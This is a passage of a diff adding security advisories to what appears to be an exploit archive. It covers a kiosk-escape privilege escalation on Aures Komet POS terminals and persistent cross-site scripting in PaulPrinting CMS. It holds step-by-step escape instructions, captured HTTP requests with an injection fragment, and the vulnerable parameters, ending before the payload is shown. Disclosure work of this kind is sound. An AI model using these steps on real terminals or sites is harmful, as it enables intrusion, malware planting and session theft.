+Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 180 +Origin:http://localhost:8080 +Connection: keep-alive +Referer:http://localhost:8080/webile_send +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +i={"os":"Windows Windows 10","b":"firefox 102.0","c":">""} +- +POST: HTTP/1.1 200 OK +Content-Type: application/json +Connection: keep-alive +Content-Encoding: gzip +Transfer-Encoding: chunked +- +http://localhost:8080/evil.source +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer:http://localhost:8080/webile_send +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Content-Type: application/octet-stream +Date: Sun, 17 Jul 2022 18:08:33 GMT +Connection: keep-alive +Content-Length: 0 + + +Security Risk: +============== +The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium. \ No newline at end of file diff --git a/exploits/php/webapps/51617.txt b/exploits/php/webapps/51617.txt new file mode 100644 index 000000000..193bbaa8a --- /dev/null +++ b/exploits/php/webapps/51617.txt @@ -0,0 +1,185 @@ +Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2323 + + +Release Date: +============= +2023-07-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2323 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Vulnerability Class: +==================== +Privilege Escalation + + +Current Estimated Price: +======================== +3.000€ - 4.000€ + + +Product & Service Introduction: +=============================== +KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or +freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk +features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. +With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to +manage customer cards and promotions. Queue management can also be optimized. + +(Copy of the Homepage:https://aures.com/de/komet/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of +the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. + + +Affected Product(s): +==================== +Aures Technologies GmbH +Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) + + +Vulnerability Disclosure Timeline: +================================== +2023-05-09: Researcher Notification & Coordination (Security Researcher) +2023-07-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Open Authentication (Anonymous Privileges) + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal +(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers +to bypass the kiosk mode to compromise the local file system and applications. + +It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are +able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security +vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local +privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate +local file-system information of the compromised windows based operating system. + +No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system +vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access. + +Vulnerable Operating System(s): +[+] Windows 10 (IoT Enterprise) + +Affected Component(s): +[+] Context Menu + +Affected Function(s): +[+] Web Search +[+] Share (Teilen) + + +Proof of Concept (PoC): +======================= +The local vulnerability can be exploited by local attackers with physical device access without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: Sheet +Touch Display => Select Food Item => Highlight Text +=> Open Context Menu => Extend Context Menu => Web-Search +=> Browser => Local File System => Compromised! + + +Manual steps to reproduce the vulnerability ... +01. First touch the monitor display to move on from standby +02. Select an food item from the menu of immergrün (we recomment the cesar wraps) +03. Push the information button of the selected food item +04. Push twice via touch to mark the selected food item text +05. Press a third time after you have marked the context by holding it down on the touch display +06. Now the function context menu of the operating system for highlighted text appears +07. On the context menu appearing 3 dots to extend the visible function menu +08. Select the web-search or share function for the highlighted content in the context menu +09. The browser of the operating system opens on the main front screen +10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) +10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) +10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information) +10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion) +10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) +10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols +10.7 Attackers are able to perform man in the middle attacks from the local computer system +11.0 Successful reproduce of the security vulnerability! + + +Reference(s): Pictures +- 1.png (Terminal A) +- 2.png (Terminal B) +- 3.png (Escape) +- 4.png (Awareness) + + +Solution - Fix & Patch: +======================= +The security vulnerabilities can be patched by following steps: +1. Disable the content menu to extend +2. Disable the context menu +3. Disable web-search +4. Disable to mark text inputs & texts +5. Disallow to open not white listed websites +6. Disable to download files +7. Restrict the web-browser access +8. Disallow the file browser +9. Disable the browser debug modus +10. Reconfigure the local firewall to allow and disallow connections +11. Change the access permission to prevent exfiltration + + +Security Risk: +============== +The security risk of the vulnerability in the local booking and payment terminal system is considered high. +The issue can be easily exploited by local attackers with simple interaction via the touch display. +Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse +it for further simple or more complex attack scenarios. + + +Credits & Authors: +================== +Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. +Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther \ No newline at end of file diff --git a/exploits/php/webapps/51618.txt b/exploits/php/webapps/51618.txt new file mode 100644 index 000000000..da965a8b1 --- /dev/null +++ b/exploits/php/webapps/51618.txt @@ -0,0 +1,257 @@ +Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2285 + + +Release Date: +============= +2023-07-19 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2285 + + +Common Vulnerability Scoring System: +==================================== +5.8 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. + +(Copy of the Homepage:https://codecanyon.net/user/codepaul ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. + + +Affected Product(s): +==================== +CodePaul +Product: PaulPrinting (2018) - CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-08-25: Researcher Notification & Coordination (Security Researcher) +2022-08-26: Vendor Notification (Security Department) +2022-**-**: Vendor Response/Feedback (Security Department) +2022-**-**: Vendor Fix/Patch (Service Developer Team) +2022-**-**: Security Acknowledgements (Security Department) +2023-07-19: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code. +After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins +in the backend (listing). + +The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own +malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in +the backend (listing). + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /printing/register +[+] /account/delivery + +Vulnerable Input(s): +[+] First name +[+] Last name +[+] Address +[+] City +[+] State + +Vulnerable Parameter(s): +[+] firstname +[+] lastname +[+] address +[+] city +[+] state + +Affected Module(s): +[+] Frontend Settings (./printing/account/setting) +[+] Frontend Delivery Address (./printing/account/delivery) +[+] Backend User Preview Listing +[+] Backend Delivery Address Contact Review + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open your browser and start a http session tamper +2. Register in the application by login click to register +3. Inject to the marked vulnerable input fields your test payload +4. Save the entry by submit via post method +5. Login to the account and preview the settings +Note: Administrators in the backend have the same wrong validated context that executes on preview of users +6. The script code executes on preview of the profile - settings +7. Successful reproduce of the first vulnerability! +8. Followup by opening the Delivery address module +9. Add a contact and add in the same vulnerable marked input fields your test payload +Note: T he script code executes on each review of the address in the backend or user frontend +10. Successful reproduce of the second vulnerability! + + +Exploitation: Payload +"